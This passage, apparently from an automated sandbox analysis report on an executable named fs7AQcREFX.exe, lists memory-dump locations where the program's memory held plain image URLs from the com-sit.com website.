00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_6.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile123.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile234.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile456ENDE.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobilr567.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/N123.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/SimonJabocWEBDE.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitBROWN-1.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitgreen-1.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-180x180.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-192x192.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-270x270.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-32x32.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/feliwegerDEweb.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/mobileChristianDEfr.jpg
